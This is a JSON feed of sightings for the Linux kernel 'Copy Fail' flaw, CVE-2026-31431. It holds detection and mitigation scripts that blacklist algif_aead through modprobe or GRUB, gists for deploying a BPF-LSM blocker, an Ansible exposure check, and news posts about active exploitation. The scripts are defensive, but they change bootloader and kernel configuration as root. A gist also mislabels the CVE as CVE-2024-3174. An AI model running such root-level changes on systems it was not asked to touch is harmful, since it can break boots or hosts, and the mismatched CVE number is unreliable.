\"$R_CONTAINER\" != \"no\" ]; then\n    printf \"  %-18s \" \"Environment\"\n    meh \"$R_CONTAINER\"\n    printf \"  %s\\n\" \"$(dim \"running inside container \u2014 apply workaround on HOST\")\"\nfi\n\necho \"$DIV\"\n\n# \u2500\u2500\u2500 verdict \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nverdict() {\n    if [ \"$R_KVER\" = \"not_affected\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   kernel predates vulnerable code (< 4.14)\\n\"\n        return 0\n    fi\n    if [ \"$R_KVER\" = \"patched\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   running a patched kernel\\n\"\n        return 0\n    fi\n    if [ \"$R_CFG\" = \"not_set\" ] && [ \"$R_MOD\" = \"absent\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   algif_aead not compiled into this kernel\\n\"\n        return 0\n    fi\n    if [ \"$R_WORKAROUND\" = \"pending\" ] && [ \"$R_MOD\" != \"loaded\" ]; then\n        printf \"  ${YELLOW}${BOLD}MITIGATED${NC}        workaround configured \u2014 ${RED}REBOOT REQUIRED${NC} to activate\\n\"\n        return 3\n    fi\n    if [ \"$R_WORKAROUND\" != \"none\" ] && [ \"$R_WORKAROUND\" != \"pending\" ] && [ \"$R_MOD\" != \"loaded\" ]; then\n        printf \"  ${YELLOW}${BOLD}MITIGATED${NC}        workaround active \u2014 upgrade kernel to apply permanent fix\\n\"\n        return 3\n    fi\n    if [ \"$R_AF_ALG\" = \"available\" ] && [ \"$R_CRYPTO\" = \"present\" ] && [ \"$R_MOD\" = \"loaded\" ]; then\n        printf \"  ${RED}${BOLD}LIKELY VULNERABLE${NC}  all preconditions met \u2014 apply workaround or upgrade kernel\\n\"\n        return 2\n    fi\n    # Module on disk (=m) or built-in (=y) with no workaround:\n    # any unprivileged user can trigger auto-load via AF_ALG socket \u2014 treat as exploitable\n    if [ \"$R_WORKAROUND\" = \"none\" ] && { [ \"$R_MOD\" = \"on_disk\" ] || [ \"$R_CFG\" = \"y\" ]; }; then\n        printf \"  ${RED}${BOLD}LIKELY VULNERABLE${NC}  module loadable/built-in, no workaround \u2014 apply workaround or upgrade kernel\\n\"\n        return 2\n    fi\n    printf \"  ${YELLOW}${BOLD}INCONCLUSIVE${NC}     not all preconditions confirmed \u2014 dynamic test recommended\\n\"\n    return 1\n}\n\nverdict\nEXIT_CODE=$?\necho \"$DIV\"\nexit $EXIT_CODE\n\n\n#!/bin/bash\n# Workaround for CVE-2026-31431 (\"Copy Fail\")\n# Disables algif_aead to prevent page-cache corruption via AF_ALG splice.\n# Supports: Debian/Ubuntu, RHEL/CentOS/Fedora, Arch, SUSE, and derivatives.\nset -e\n\n# ---------------------------------------------------------------------------\n# Pre-flight: must run as root\n# ---------------------------------------------------------------------------\nif [ \"$EUID\" -ne 0 ]; then\n    if command -v sudo >/dev/null 2>&1; then\n        exec sudo \"$0\" \"$@\"\n    else\n        echo \"[-] This script must be run as root.\" >&2\n        exit 1\n    fi\nfi\n\n# ---------------------------------------------------------------------------\n# Container detection \u2014 modprobe blacklist written here affects only THIS\n# container's namespace; it does NOT protect the host kernel.  The built-in\n# (=y) GRUB path is also ineffective because /etc/default/grub inside the\n# container is not the host's bootloader config.\n# ---------------------------------------------------------------------------\nIS_CONTAINER=0\nif [ -f /.dockerenv ] \\\n    || grep -qE \"lxc|kubepods|docker|containerd\" /proc/1/cgroup 2>/dev/null \\\n    || [ -n \"${container:-}\" ]; then\n    IS_CONTAINER=1\n    echo \"[!] Container environment detected.\"\n    echo \"    Workaround applied here affects only this container's namespace.\"\n    echo \"    Apply this script on the HOST system to protect the host kernel.\"\n    echo \"\"\nfi\n\n# ---------------------------------------------------------------------------\n# Detect distro (for logging only \u2014 tool detection drives behaviour)\n# ---------------------------------------------------------------------------\nDISTRO=\"unknown\"\nif [ -f /etc/os-release ]; then\n    DISTRO=$(. /etc/os-release && echo \"${NAME:-unknown}\")\nfi\n\n# ---------------------------------------------------------------------------\n# Detect initramfs rebuild tool\n# ---------------------------------------------------------------------------\nif command -v dracut >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"dracut -f\"\nelif command -v update-initramfs >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"update-initramfs -u\"\nelif command -v mkinitcpio >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"mkinitcpio -P\"\nelif command -v mkinitfs >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"mkinitfs\"           # Alpine Linux\nelse\n    INITRAMFS_CMD=\"\"\nfi\n\n# ---------------------------------------------------------------------------\n# Detect GRUB config tool and target config path\n# ---------------------------------------------------------------------------\nif command -v grub2-mkconfig >/dev/null 2>&1; then\n    GRUB_MKCFG=\"grub2-mkconfig\"\nelif command -v grub-mkconfig >/dev/null 2>&1; then\n    GRUB_MKCFG=\"grub-mkconfig\"\nelse\n    GRUB_MKCFG=\"\"\nfi\n\n# grubby is the preferred kernel-cmdline tool on RHEL/CentOS/Fedora;\n# it handles both legacy GRUB and BLS (Boot Loader Specification) entries.\nif command -v grubby >/dev/null 2>&1; then\n    GRUB_KERNEL_TOOL=\"grubby\"\nelse\n    GRUB_KERNEL_TOOL=\"grub\"\nfi\n\ndetect_grub_cfg_path() {\n    if [ -d /sys/firmware/efi ]; then\n        # Try distro-specific EFI path first to avoid picking the wrong entry\n        # when multiple distros share the same EFI partition.\n        local distro_id cfg\n        distro_id=$(. /etc/os-release 2>/dev/null && echo \"${ID:-}\" || echo \"\")\n        if [ -n \"$distro_id\" ] && [ -f \"/boot/efi/EFI/${distro_id}/grub.cfg\" ]; then\n            echo \"/boot/efi/EFI/${distro_id}/grub.cfg\"\n            return\n        fi\n        # Exclude the generic BOOT fallback directory to avoid stale entries.\n        cfg=$(find /boot/efi/EFI -maxdepth 2 -name \"grub.cfg\" 2>/dev/null \\\n            | grep -iv \"/BOOT/\" | head -1)\n        [ -z \"$cfg\" ] && cfg=$(find /boot/efi -name \"grub.cfg\" 2>/dev/null | head -1)\n        if [ -z \"$cfg\" ]; then\n            echo \"[-] UEFI boot detected but no grub.cfg found under /boot/efi\" >&2\n            exit 1\n        fi\n        echo \"$cfg\"\n    elif [ -f /boot/grub2/grub.cfg ]; then\n        echo \"/boot/grub2/grub.cfg\"\n    elif [ -f /boot/grub/grub.cfg ]; then\n        echo \"/boot/grub/grub.cfg\"\n    else\n        echo \"[-] Cannot locate grub.cfg \u2014 searched /boot/grub2 and /boot/grub\" >&2\n        exit 1\n    fi\n}\n\n# ---------------------------------------------------------------------------\n# Read kernel config\n# ---------------------------------------------------------------------------\nKERNEL=$(uname -r)\nCONFIG_VAL=$(grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" /boot/config-\"$KERNEL\" 2>/dev/null \\\n    || zcat /proc/config.gz 2>/dev/null | grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" \\\n    || echo \"NOT_FOUND\")\n\necho \"[*] Distro : $DISTRO\"\necho \"[*] Kernel : $KERNEL\"\necho \"[*] CONFIG_CRYPTO_USER_API_AEAD: $CONFIG_VAL\"\necho \"[*] initramfs tool: ${INITRAMFS_CMD:-NOT FOUND}\"\necho \"[*] GRUB mkconfig : ${GRUB_MKCFG:-NOT FOUND}\"\necho \"[*] kernel cmdline: ${GRUB_KERNEL_TOOL}\"\necho \"\"\n\n# ---------------------------------------------------------------------------\ncase \"$CONFIG_VAL\" in\n\n    CONFIG_CRYPTO_USER_API_AEAD=m)\n        echo \"[*] Module mode \u2014 rmmod + blacklist + initramfs rebuild\"\n\n        # Unload with modprobe -r to handle dependencies gracefully.\n        # Do NOT exit if unload fails (e.g. module in use, container) \u2014\n        # the blacklist still prevents reload after next reboot.\n        if lsmod | grep -q \"^algif_aead\"; then\n            if modprobe -r algif_aead 2>/dev/null; then\n                echo \"[+] algif_aead unloaded\"\n            else\n                echo \"[!] Could not unload algif_aead (module in use or insufficient privileges)\"\n                echo \"    Blacklist will prevent reload. Reboot to fully apply.\"\n            fi\n        else\n            echo \"[*] algif_aead not currently loaded, skipping unload\"\n        fi\n\n        BLACKLIST_FILE=\"/etc/modprobe.d/disable-algif_aead.conf\"\n        if [ -f \"$BLACKLIST_FILE\" ]; then\n            echo \"[*] Blacklist already present at $BLACKLIST_FILE\"\n        else\n            echo \"install algif_aead /bin/false\" | tee \"$BLACKLIST_FILE\" > /dev/null\n            echo \"[+] Blacklisted at $BLACKLIST_FILE\"\n\n            if [ -z \"$INITRAMFS_CMD\" ]; then\n                echo \"[-] No initramfs rebuild tool found (dracut / update-initramfs / mkinitcpio).\" >&2\n                echo \"    Rebuild initramfs manually before next boot.\" >&2\n            else\n                $INITRAMFS_CMD\n                echo \"[+] initramfs rebuilt ($INITRAMFS_CMD)\"\n            fi\n        fi\n        ;;\n\n    CONFIG_CRYPTO_USER_API_AEAD=y)\n        echo \"[!] Built-in mode \u2014 must use initcall_blacklist via GRUB kernel cmdline\"\n\n        PARAM=\"initcall_blacklist=algif_aead_init\"\n\n        if [ \"$GRUB_KERNEL_TOOL\" = \"grubby\" ]; then\n            # RHEL / CentOS / Fedora: grubby handles both legacy GRUB and BLS entries.\n            if grubby --info=ALL 2>/dev/null | grep -qF \"$PARAM\"; then\n                echo \"[*] $PARAM already present in kernel args (grubby), skipping\"\n            else\n                grubby --update-kernel=ALL --args=\"$PARAM\"\n                echo \"[+] Added $PARAM to all kernel entries via grubby\"\n                echo \"[+] Reboot to apply. Verify: cat /proc/cmdline | grep initcall_blacklist\"\n            fi\n        else\n            # Debian / Ubuntu / Arch / SUSE: edit /etc/default/grub then mkconfig\n            GRUB_FILE=\"/etc/default/grub\"\n\n            if ! [ -f \"$GRUB_FILE\" ]; then\n                echo \"[-] $GRUB_FILE not found \u2014 cannot configure GRUB automatically.\" >&2\n                echo \"    Add '$PARAM' to your bootloader's kernel command line manually.\" >&2\n                exit 1\n            fi\n\n            if grep -q \"$PARAM\" \"$GRUB_FILE\"; then\n                echo \"[*] $PARAM already present in $GRUB_FILE, skipping\"\n            else\n                # Prefer GRUB_CMDLINE_LINUX (all entries) over _DEFAULT (default entry only)\n                if grep -q \"^GRUB_CMDLINE_LINUX=\" \"$GRUB_FILE\"; then\n                    GRUB_VAR=\"GRUB_CMDLINE_LINUX\"\n                elif grep -q \"^GRUB_CMDLINE_LINUX_DEFAULT=\" \"$GRUB_FILE\"; then\n                    GRUB_VAR=\"GRUB_CMDLINE_LINUX_DEFAULT\"\n                else\n                    echo \"[-] Neither GRUB_CMDLINE_LINUX nor GRUB_CMDLINE_LINUX_DEFAULT found in $GRUB_FILE\" >&2\n                    echo \"    Add '$PARAM' to your bootloader's kernel command line manually.\" >&2\n                    exit 1\n                fi\n\n                sed -i \"s|\\(${GRUB_VAR}=\\\"[^\\\"]*\\)\\\"|\\1 ${PARAM}\\\"|\" \"$GRUB_FILE\"\n\n                # Verify the parameter was actually inserted\n                if ! grep -q \"$PARAM\" \"$GRUB_FILE\"; then\n                    echo \"[-] sed substitution failed \u2014 $PARAM not found in $GRUB_FILE after edit.\" >&2\n                    echo \"    Add '$PARAM' to ${GRUB_VAR} in $GRUB_FILE manually.\" >&2\n                    exit 1\n                fi\n                echo \"[+] Added $PARAM to $GRUB_VAR in $GRUB_FILE\"\n\n                if [ -z \"$GRUB_MKCFG\" ]; then\n                    echo \"[-] No GRUB config tool found (grub2-mkconfig / grub-mkconfig).\" >&2\n                    echo \"    Regenerate your GRUB config manually before rebooting.\" >&2\n                    exit 1\n                fi\n\n                GRUB_CFG=$(detect_grub_cfg_path)\n                echo \"[*] Regenerating GRUB config at $GRUB_CFG\"\n                $GRUB_MKCFG -o \"$GRUB_CFG\"\n                echo \"[+] GRUB updated \u2014 reboot required to apply\"\n                echo \"    After reboot, verify with: cat /proc/cmdline | grep initcall_blacklist\"\n            fi\n        fi\n        ;;\n\n    NOT_FOUND)\n        echo \"[-] Kernel config not found.\" >&2\n        echo \"    Try: grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$KERNEL\" >&2\n        exit 1\n        ;;\n\n    *)\n        echo \"[-] Unexpected config value: $CONFIG_VAL\" >&2\n        exit 1\n        ;;\nesac\n\n# ---------------------------------------------------------------------------\n# Verification\n# ---------------------------------------------------------------------------\necho \"\"\necho \"[+] Done.\"\n\ncase \"$CONFIG_VAL\" in\n    CONFIG_CRYPTO_USER_API_AEAD=m)\n        if lsmod | grep -q \"^algif_aead\"; then\n            echo \"[!] WARNING: algif_aead is still loaded \u2014 unload failed.\"\n        else\n            echo \"[+] algif_aead is NOT loaded. Workaround active immediately.\"\n        fi\n        ;;\n    CONFIG_CRYPTO_USER_API_AEAD=y)\n        echo \"[*] Built-in module \u2014 workaround takes effect after reboot.\"\n        echo \"    Post-reboot check: cat /proc/cmdline | grep initcall_blacklist\"\n        ;;\nesac", "creation_timestamp": "2026-05-05T12:01:42.000000Z"}, {"uuid": "55210ab0-290c-4267-9506-5de24d20b926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/adegoodyer/4ac687c6d25980f02401cab22a2f9f9e", "content": "# Copy Fail Blocker\n- [Copy Fail Blocker](#copy-fail-blocker)\n  - [Overview](#overview)\n  - [Issue](#issue)\n  - [Resources](#resources)\n  - [Check Vulnerability](#check-vulnerability)\n  - [Deploy Copy Fail Blocker Viability](#deploy-copy-fail-blocker-viability)\n  - [Deploy Copy Fail Blocker](#deploy-copy-fail-blocker)\n  - [Remove Copy Fail Blocker](#remove-copy-fail-blocker)\n\n## Overview\n- BPF-LSM mitigation for the copy fail vulnerability (CVE-2024-3174) in the Linux kernel\n- DaemonSet attaches single BPF-LSM program to the socket_create hook on every node\n- [GitHub: copy-fail-blocker](https://github.com/cozystack/copy-fail-blocker)\n\n## Issue\n- AWS haven't yet release an AMI that includes an upstream fix\n- upgrading to latest AMI version still has container version `kernel6.12-6.12.79-101.147.amzn2023` which is still vulnerable\n\n## Resources\n- [AWS Containers Roadmap](https://github.com/aws/containers-roadmap/issues/2808)\n- [ALSC Status updates](https://explore.alas.aws.amazon.com/CVE-2026-31431.html)\n\n## Check Vulnerability\n```bash\n# ssh into any EKS node\n\n# check for copy fail vulnerability\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# FAIL: AF_ALG socket created - not protected\n```\n\n## Deploy Copy Fail Blocker Viability\n```bash\n# check what BPF LSM is compiled in\ngrep CONFIG_BPF_LSM /boot/config-$(uname -r)\n# CONFIG_BPF_LSM=y\n\n# check bpf is in active LSM stack\ncat /sys/kernel/security/lsm\n# lockdown,capability,landlock,yama,safesetid,selinux,bpf,ima\n```\n\n## Deploy Copy Fail Blocker\n```bash\n# deploy copy fail blocker\nk  apply -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n\n# verify rollout\nk -n kube-system rollout status daemonset/copy-fail-blocker\n\n# verify copy fail is blocked\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# OK: [Errno 1] Operation not permitted\n```\n\n## Remove Copy Fail Blocker\n- remove once an AMI has been released with fix\n\n```bash\n# remove copy fail blocker\nk delete -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n```\n", "creation_timestamp": "2026-05-06T10:35:54.000000Z"}, {"uuid": "99c0d926-8bdd-4b90-991c-4d2dcc4cf806", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fookhwa.bsky.social/post/3ml6itwotpo2u", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431) - Help Net Security", "creation_timestamp": "2026-05-06T10:34:03.960587Z"}, {"uuid": "e1909d62-702b-471b-a29e-b4213da81ea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/jpf-okteto/f82ba1e8aa47320b48288aa30a6192a9", "content": "# Copy Fail Blocker\n- [Copy Fail Blocker](#copy-fail-blocker)\n  - [Overview](#overview)\n  - [Issue](#issue)\n  - [Resources](#resources)\n  - [Check Vulnerability](#check-vulnerability)\n  - [Deploy Copy Fail Blocker Viability](#deploy-copy-fail-blocker-viability)\n  - [Deploy Copy Fail Blocker](#deploy-copy-fail-blocker)\n  - [Remove Copy Fail Blocker](#remove-copy-fail-blocker)\n\n## Overview\n- BPF-LSM mitigation for the copy fail vulnerability (CVE-2024-3174) in the Linux kernel\n- DaemonSet attaches single BPF-LSM program to the socket_create hook on every node\n- [GitHub: copy-fail-blocker](https://github.com/cozystack/copy-fail-blocker)\n\n## Issue\n- AWS haven't yet release an AMI that includes an upstream fix\n- upgrading to latest AMI version still has container version `kernel6.12-6.12.79-101.147.amzn2023` which is still vulnerable\n\n## Resources\n- [AWS Containers Roadmap](https://github.com/aws/containers-roadmap/issues/2808)\n- [ALSC Status updates](https://explore.alas.aws.amazon.com/CVE-2026-31431.html)\n\n## Check Vulnerability\n```bash\n# ssh into any EKS node\n\n# check for copy fail vulnerability\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# FAIL: AF_ALG socket created - not protected\n```\n\n## Deploy Copy Fail Blocker Viability\n```bash\n# check what BPF LSM is compiled in\ngrep CONFIG_BPF_LSM /boot/config-$(uname -r)\n# CONFIG_BPF_LSM=y\n\n# check bpf is in active LSM stack\ncat /sys/kernel/security/lsm\n# lockdown,capability,landlock,yama,safesetid,selinux,bpf,ima\n```\n\n## Deploy Copy Fail Blocker\n```bash\n# deploy copy fail blocker\nk  apply -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n\n# verify rollout\nk -n kube-system rollout status daemonset/copy-fail-blocker\n\n# verify copy fail is blocked\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# OK: [Errno 1] Operation not permitted\n```\n\n## Remove Copy Fail Blocker\n- remove once an AMI has been released with fix\n\n```bash\n# remove copy fail blocker\nk delete -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n```\n", "creation_timestamp": "2026-05-06T11:19:12.000000Z"}, {"uuid": "4e572807-2624-49ad-8798-422f76f31769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml6marlb7tu2", "content": "Copy Fail (CVE-2026-31431): Patching kernels without rebooting Most kernel CVEs follow a predictable rhythm for hosting providers: read the advisory, schedule a maintenance window, reboot during of...\n\n#KernelCare #CVE #Vulnerability #Live #Patching #Kernel #Update\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T11:37:56.254037Z"}, {"uuid": "95c8731d-e711-46c3-895b-e586cc722990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ml6rh7ws2pd2", "content": "CopyFail\u2019s Silent Root Takeover: How a Nine-Year Linux Kernel Flaw Ignites Active Exploits and CISA\u2019s Urgent Patch Mandate CVE-2026-31431, the CopyFail Linux kernel flaw, enables unprivileged r...\n\n#CybersecurityUpdate #CISA #KEV #CopyFail #CVE-2026-31431 [\u2026] \n\n[Original post on webpronews.com]", "creation_timestamp": "2026-05-06T13:12:05.555336Z"}, {"uuid": "54f431dd-08a1-4748-9fb3-7d4646dab8dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/WeszNL/b7a1079b1a9973117d33b7d729638fbe", "content": "Quickly scan all ansible'd hosts for potential exposure to CVE-2026-31431 (COPY-FAIL).\n\n```bash\nansible all -i inventory -b -m shell -a \"test -d /sys/module/algif_aead && echo 'algif_aead=loaded' || echo 'algif_aead=not_loaded'; echo 'MODPROBE_CHECK:'; modprobe -n -v algif_aead 2>&1 | sed 's/^/modprobe: /'\"\n\nDoes:\n- checks if the algif_aead kernel module is currently loaded on each host\n- verifies whether the module can be loaded via modprobe (dry-run)\n- helps assess potential exposure without making changes\n\nDoes not:\n- patch anything; you need to mitigate or update kernels yourself", "creation_timestamp": "2026-05-06T14:03:16.000000Z"}, {"uuid": "d3d42c43-dcd4-4b15-97b9-ff9fbf82e0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nadsec.online/post/3ml46kgtazk2d", "content": "Presenting, for absolutely no reason at all, CVE-2026-31431 as a 587-byte x86_64 static ELF:\ngithub.com/Rat5ak/CVE-2...", "creation_timestamp": "2026-05-05T12:24:28.936091Z"}, {"uuid": "65c9b4b6-ec69-4a55-a6bc-93b601a36bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/qLtl-ESgxngd0KdCJZLq4iZUn677J7G_lqnf1Nr9VcS_CEGq", "content": "", "creation_timestamp": "2026-05-05T11:26:46.000000Z"}, {"uuid": "bc9b1a7f-d8e6-441d-a351-07d95ba515b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lascapi.social.tchncs.de.ap.brid.gy/post/3ml6wld6itgv2", "content": "Copy Fail CVE-2026-31431\n\n> How they found it\n> Taeyang Lee's earlier kernelCTF work had mapped out the AF_ALG attack surface. He realized that AF_ALG + splice creates a path where unprivileged userspace can feed page cache pages directly into the crypto subsystem and suspected that scatterlist [\u2026]", "creation_timestamp": "2026-05-06T14:39:51.127335Z"}, {"uuid": "cc3399bc-a40f-4d21-aae5-3f61f855e049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3ml6yfwt4jj2r", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\u00a0Catalog\n\nCISA has added CVE-2026-31431, a Linux local privilege escalation bug, to the KEV catalog after signs of active exploitation.", "creation_timestamp": "2026-05-06T15:12:33.443335Z"}, {"uuid": "3420ae3a-3e8e-4479-a929-5c461ac6e2dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/puntocomunica2.bsky.social/post/3ml6yhpdj322e", "content": "\ud83d\udea8 URGENTE: Vulnerabilidad del kernel \u00abCopy Fail\u00bb (CVE-2026-31431): Acci\u00f3n inmediata requerida indaga.net/urgente-vuln...", "creation_timestamp": "2026-05-06T15:13:35.009425Z"}, {"uuid": "5e7f64c5-b9f8-4e62-91c3-37e08ad4cd40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/AdvisoryICS/statuses/116522501138000759", "content": "ICSAP Analysis Report | ICSAP-AN-26-001 - Read full report at : https://drive.google.com/file/d/1v5RWBFT0cHFUDkUhM0enwh3t1PdOGVcv/view\nReading Between the Advisories: Linux Kernel CVE-2026-31431 in the ICS Ecosystem\nCVE-2026-31431 (\"Copy Fail\") was added to CISA's KEV Catalog on May 1. Theori's Xint Code research team disclosed it on April 29. It's a 9-year-old logic flaw in the Linux kernel's algif_aead module that lets any unprivileged local user escalate to root using a 732-byte Python script. The same exploit works on Ubuntu, Amazon Linux, RHEL, and SUSE without modification.\nThe mainstream security community has covered this well. What hasn't been written is the ICS angle.\nWe reviewed both the CISA ICS Advisory dataset (3,800 advisories since 2010) and the ICS[AP] Other CERT and Vendor ICS Advisories dataset (12,468 advisories) to see which industrial control system products have documented Linux exposure to this CVE.\nThree observations:\nOnly 0.8% of CISA ICS advisories have ever explicitly mentioned Linux, the kernel, or embedded Linux components. Across 3,800 advisories, only two disclose a specific kernel version, and both are end-of-life branches.\nSchneider Electric (234 CISA advisories, zero Linux mentions), Rockwell Automation (246, zero), Mitsubishi Electric (119, zero), Hitachi Energy (103, zero), and Moxa (53, zero) have published nothing about Linux in their CISA advisory text, despite shipping Linux-based product lines per their own technical documentation.\nContainer escape applies. CODESYS Control containers, Advantech IoTSuite Edge dockers, Bosch Rexroth ctrlX CORE container apps, and similar containerized industrial edge platforms are subject to the container-breakout behavior identified in Microsoft Defender's published analysis.\nAsset owners cannot rely on advisory text to assess exposure. Direct vendor PSIRT engagement is the only defensible path. As of publication, no major ICS vendor has published a CVE-2026-31431-specific advisory.\nICSAP-AN-26-001 is the inaugural ICSAP Analysis Report. It covers the CVE technical mechanism with primary-source attribution to Theori, a Tier 1A list of 16 ICS product lines with documented Linux exposure, a Tier 2 list of 14 vendors whose Linux products do not surface in advisory text, and practitioner guidance for the next four to six weeks.\nRead the full report at icsadvisoryproject.com.\n#ICS #OTSecurity #CriticalInfrastructure #LinuxKernel #CopyFail #VulnerabilityManagement", "creation_timestamp": "2026-05-05T14:44:29.825760Z"}, {"uuid": "9beea3d7-9e81-49fa-9597-7bbf4f07f06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml6yibsgk5f2", "content": "CISA alerta de explotaci\u00f3n activa de Copy Fail para obtener root en Linux CVE-2026-31431 (Copy Fail) ya se est\u00e1 explotando de forma activa para lograr root en sistemas Linux, lo que ha llevado CV...\n\n#Seguridad\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T15:16:43.427430Z"}, {"uuid": "6d204d84-d216-4694-bb6c-1b7eb2522478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/196f93bbcfa280f66e78ec302180f773", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  